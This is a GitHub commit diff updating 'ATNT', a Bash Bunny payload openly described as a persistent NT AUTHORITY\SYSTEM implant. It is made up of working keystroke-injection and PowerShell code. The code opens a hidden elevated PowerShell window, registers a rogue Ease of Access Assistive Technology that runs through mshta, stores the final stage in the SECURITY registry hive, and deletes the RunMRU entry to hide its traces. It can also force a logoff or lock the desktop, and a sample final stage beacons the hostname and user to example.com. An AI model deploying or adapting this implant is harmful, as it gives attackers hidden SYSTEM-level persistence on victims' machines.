ATNT update: working version (#461)
* Delete stage3.ps1 * Update ATNT to work as intended. Update ATNT to work as intended. Requires reboot or logoff to fully register AT. * Remove DONE file in cleanup. Forgot to remove DONE file. Now also makes sure this file does not exist before running.pull/462/head
9o3
GitHub
parent
4f6cd4b54d
commit
1efd6a1116
|
|
@ -0,0 +1,18 @@
|
|||
# ATNT : Persistent NT AUTHORITY\SYSTEM implant
|
||||
|
||||
Uses Windows [Ease of Access Assistive Technology](https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration) to persistently run code with NT AUTHORITY\SYSTEM rights.
|
||||
|
||||
## Options
|
||||
### :warning: FORCE_LOGOFF
|
||||
> Ease of Access Assistive Technologies (ATs) are only callable after a restart or logoff. Setting this setting to true will forcefully log the user off. Unsaved work on the target may be lost.
|
||||
### :warning: LOCK_ON_USER
|
||||
> After the AT has been successfully registered (target machine has rebooted or user has been logged off), the AT will be launched when the user first logs in. The AT is ran as User, and thus can not complete its installation. Setting this setting to true will lock the desktop as soon as the user first logs in. This may cause suspicion for the target user, but only happens once.
|
||||
### RUN_IMMEDIATELY
|
||||
> When the AT is first launched as NT AUTHORITY/SYSTEM, the final stage is written to the SECURITY registry hive. Only NT AUTHORITY/SYSTEM has access to this hive. Setting this setting to true will also immediately run the final stage, instead of waiting for a second switch to a Secure Desktop to launch the final stage.
|
||||
|
||||
## final_stage.ps1
|
||||
The final_stage.ps1 file is merged into the second stage. Usage of `@"\n..."@\n` is therefore not possible. Variable definition and usage should be escaped as follows:
|
||||
```powershell
|
||||
`$example = 1;
|
||||
Write-Host `$example;
|
||||
```
|
||||
|
|
@ -1 +1,2 @@
|
|||
iwr ('https://example.com/beacon_'+(whoami))
|
||||
<#([WmiClass]'Win32_Process').Create('powershell -NoE -NoP whoami');#>
|
||||
iwr ("example.com/{0}:{1}" -f (hostname),(whoami))
|
||||
|
|
@ -1,86 +1,75 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: ATNT : Persistent NT AUTHORITY\SYSTEM implant
|
||||
# Description: Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration)
|
||||
# To persistently run code with NT AUTHORITY\SYSTEM rights.
|
||||
# Author: 9o3
|
||||
# Twitter: @BugBot4
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Attackmodes: HID, Storage
|
||||
#
|
||||
# LED STATUS
|
||||
# ==========
|
||||
# SETUP.......Generate stage files
|
||||
# STAGE1......Run hidden elevated PowerShell window that creates the AT
|
||||
# STAGE2......Trigger the newly created AT
|
||||
# STAGE3......Update the newly created AT to run the final stage
|
||||
# STAGE4......(OPTIONAL) Trigger the updated AT to run the final stage
|
||||
# CLEANUP.....Remove generated files
|
||||
# FINISH......Finished
|
||||
#
|
||||
# OPTIONS
|
||||
# =======
|
||||
# Final stage configured from included final_stage.ps1 script
|
||||
# run_final_stage => Setting this to false will instead trigger the final stage when the user switches to a Secure Desktop
|
||||
run_final_stage=true
|
||||
|
||||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
cd /root/udisk/payloads/
|
||||
cd $SWITCH_POSITION
|
||||
sed "s/!SWITCH!/$SWITCH_POSITION/g" stage2.ps1 > 2
|
||||
sed '/!FINAL_STAGE!/{
|
||||
s/!FINAL_STAGE!//g
|
||||
r final_stage.ps1
|
||||
}' stage3.ps1 > 3
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
######## Run hidden elevated PowerShell window ########
|
||||
# Runs hidden elevated powershell which executes stage2.ps1
|
||||
LED STAGE1
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
|
||||
QUACK DELAY 200
|
||||
QUACK CTRL-SHIFT ENTER
|
||||
QUACK DELAY 750
|
||||
QUACK LEFTARROW
|
||||
QUACK DELAY 100
|
||||
QUACK ENTER
|
||||
|
||||
######## Trigger the newly created AT ########
|
||||
# ATs are tirggered by a desktop switch. Secure Desktops launch ATs as NT AUTHORITY\SYSTEM
|
||||
# The AT gets and executes stage3.ps1
|
||||
LED STAGE2
|
||||
QUACK DELAY 1000
|
||||
QUACK CTRL-ALT DEL
|
||||
QUACK DELAY 750
|
||||
QUACK ESC
|
||||
|
||||
######## Update the newly created AT ########
|
||||
# Write the content of final_stage.ps1 to the SECURITY hive, which is only readable as NT AUTHORITY\SYSTEM
|
||||
# Updates the newly created AT to read and execute the final stage from the SECURITY hive
|
||||
LED STAGE3
|
||||
until [ -f /root/udisk/DONE ]
|
||||
do
|
||||
sleep 0.2
|
||||
done
|
||||
if [ "$run_final_stage" = true ] ; then
|
||||
######## Trigger the updated AT ########
|
||||
# Trigger the updated AT as NT AUTHORITY\SYSTEM and execute the final stage
|
||||
LED STAGE4
|
||||
QUACK CTRL-ALT DEL
|
||||
QUACK DELAY 750
|
||||
QUACK ESC
|
||||
fi
|
||||
|
||||
######## Remove generated files ########
|
||||
# Removes the generated stages and the DONE file used to indicate the end of the third stage
|
||||
LED CLEANUP
|
||||
rm /root/udisk/DONE
|
||||
rm 2
|
||||
rm 3
|
||||
sync
|
||||
LED FINISH
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: ATNT : Persistent NT AUTHORITY\SYSTEM implant
|
||||
# Description: Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration)
|
||||
# To persistently run code with NT AUTHORITY\SYSTEM rights.
|
||||
# Author: 9o3
|
||||
# Twitter: @BugBot4
|
||||
# Version: 1.1
|
||||
# Category: Execution
|
||||
# Attackmodes: HID, Storage
|
||||
#
|
||||
# LED STATUS
|
||||
# ==========
|
||||
# SETUP.......Generate stage file
|
||||
# ATTACK......Run hidden elevated PowerShell window that creates the AT and drops associated code
|
||||
# CLEANUP.....Remove generated files
|
||||
# FINISH......Finished
|
||||
#
|
||||
# OPTIONS
|
||||
# =======
|
||||
# Final stage configured from included final_stage.ps1 script
|
||||
# FORCE_LOGOFF => Setting this setting to true will forcefully log the user off. Unsaved work on the target may be lost.
|
||||
# LOCK_ON_USER => Lock the desktop as soon as the user first logs in. This may cause suspicion for the target user, but only happens once. Doing this starts the AT as NT AUTHORITY/SYSTEM.
|
||||
# RUN_IMMEDIATELY => Run the final stage as soon as the AT is ran as NT AUTHORITY/SYSTEM, instead of running it after it has been called from the SECURITY hive.
|
||||
FORCE_LOGOFF=true
|
||||
LOCK_ON_USER=true
|
||||
RUN_IMMEDIATELY=true
|
||||
|
||||
######## Generate stage file ########
|
||||
# Alter second stage based on settings & merge final stage.ps1 into second stage
|
||||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
rm /root/udisk/DONE
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION
|
||||
if [ "$RUN_IMMEDIATELY" = true ] ; then
|
||||
RUN_IMMEDIATELY_TEXT='iex `$p'
|
||||
fi
|
||||
if [ "$LOCK_ON_USER" = true ] ; then
|
||||
LOCK_ON_USER_TEXT='rundll32.exe user32.dll,LockWorkStation;'
|
||||
fi
|
||||
if [ "$FORCE_LOGOFF" = true ] ; then
|
||||
FORCE_LOGOFF_TEXT='(Get-WmiObject -Class Win32_OperatingSystem).Win32Shutdown(4)'
|
||||
fi
|
||||
|
||||
sed -e "s/#RI#/$RUN_IMMEDIATELY_TEXT/g" -e "s/<#LI#>/$LOCK_ON_USER_TEXT/g" -e "s/#FL#/$FORCE_LOGOFF_TEXT/g" -e '/!FINAL_STAGE!/{
|
||||
s/!FINAL_STAGE!//g
|
||||
r final_stage.ps1
|
||||
}' stage2.ps1 > 2
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
######## Run hidden elevated PowerShell window ########
|
||||
# Runs hidden elevated powershell which executes stage2.ps1
|
||||
LED STAGE1
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
|
||||
QUACK DELAY 200
|
||||
QUACK CTRL-SHIFT ENTER
|
||||
QUACK DELAY 1200
|
||||
QUACK LEFTARROW
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
until [ -f /root/udisk/DONE ]
|
||||
do
|
||||
sleep 0.2
|
||||
done
|
||||
|
||||
######## Remove generated files ########
|
||||
# Removes the generated stage file and sync file system
|
||||
LED CLEANUP
|
||||
rm 2
|
||||
rm /root/udisk/DONE
|
||||
sync
|
||||
LED FINISH
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
#Remove latest run entry
|
||||
$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=(gp $p).$m; rp $p $l[0]; sp $p $m $l.Substring(1);
|
||||
$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=gpv $p $m; rp $p $l[0]; sp $p $m $l.Substring(1);
|
||||
|
||||
# Create AT to run next stage
|
||||
$at = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs"
|
||||
|
|
@ -8,7 +8,45 @@ New-Item -Path $at -Name "atnt" -Force
|
|||
New-ItemProperty -Path $atnt -Name "CopySettingsToLockedDesktop" -Value 1 -PropertyType "DWord" -Force
|
||||
New-ItemProperty -Path $atnt -Name "SimpleProfile" -Value "atnt" -PropertyType "String" -Force
|
||||
New-ItemProperty -Path $atnt -Name "StartExe" -Value "%SystemRoot%\System32\mshta.exe" -PropertyType "ExpandString" -Force
|
||||
New-ItemProperty -Path $atnt -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\!SWITCH!\3')-Raw)"",0)(Window.Close))" -PropertyType "String" -Force
|
||||
New-ItemProperty -Path $atnt -Name "StartParams" -Value ("vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP ([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SOFTWARE\Microsoft\Windows`` NT\CurrentVersion\Accessibility\ATs\atnt 0)')"",0)(Window.Close))") -PropertyType "String" -Force
|
||||
|
||||
# The value of this is ran when the AT is launched.
|
||||
# If the AT is launched with user privilages, lock the workstation. This trigger the AT to be launched a second time as NT AUTHORITY/SYSTEM.
|
||||
# When launched as NT AUTHORITY/SYSTEM, the next stage is retrieved from the registry and ran.
|
||||
New-ItemProperty -Path $atnt -Name "0" -Value @"
|
||||
if((whoami) -ne 'NT AUTHORITY\SYSTEM'){<#LI#>exit;}
|
||||
iex(gpv HKLM:\SOFTWARE\Microsoft\Windows`` NT\CurrentVersion\Accessibility\ATs\atnt 1)
|
||||
"@
|
||||
|
||||
# The value of this is ran when the AT is launched with NT AUTHORITY/SYSTEM rights.
|
||||
# Uses Set-Alias and short variable names to fit payload in a single registry entry.
|
||||
New-ItemProperty -Path $atnt -Name "1" -Value @"
|
||||
`$a = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt";
|
||||
`$p = gpv `$a 2;
|
||||
sal nip New-ItemProperty;
|
||||
sal rip Remove-ItemProperty;
|
||||
ni -Path "HKLM:\SECURITY\Policy" -Name PolAtnt -Force;
|
||||
nip -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value `$p -PropertyType "string" -Force;
|
||||
nip -Path `$a -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force;
|
||||
rip -Path `$a -Name "2" -Force;
|
||||
rip -Path `$a -Name "1" -Force;
|
||||
rip -Path `$a -Name "0" -Force;
|
||||
#RI#
|
||||
"@
|
||||
|
||||
# The final stage is later written to the SECURITY hive, this hive is only visible by NT AUTHORITY/SYSTEM.
|
||||
New-ItemProperty -Path $atnt -Name "2" -Value @"
|
||||
!FINAL_STAGE!
|
||||
|
||||
"@
|
||||
|
||||
|
||||
#Add the newly created AT to automatically start on a desktop switch.
|
||||
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force
|
||||
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force;
|
||||
|
||||
#Let the Bash Bunny know we're done here & Eject.
|
||||
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
|
||||
New-Item -ItemType file $bb"DONE";
|
||||
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");
|
||||
|
||||
#FL#
|
||||
|
|
|
|||
|
|
@ -1,14 +0,0 @@
|
|||
$payload = @"
|
||||
!FINAL_STAGE!
|
||||
"@
|
||||
|
||||
New-Item -Path "HKLM:\SECURITY\Policy" -Name "PolAtnt" -Force
|
||||
New-ItemProperty -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value $payload -PropertyType "string" -Force
|
||||
|
||||
# The final stage is ran in a new orphaned PowerShell process to prevent it from closing when the Secure Desktop closes.
|
||||
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt" -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force
|
||||
|
||||
#Let the Bash Bunny know we're done here & Eject.
|
||||
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
|
||||
New-Item -ItemType file $bb"DONE";
|
||||
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");
|
||||
Loading…
Reference in New Issue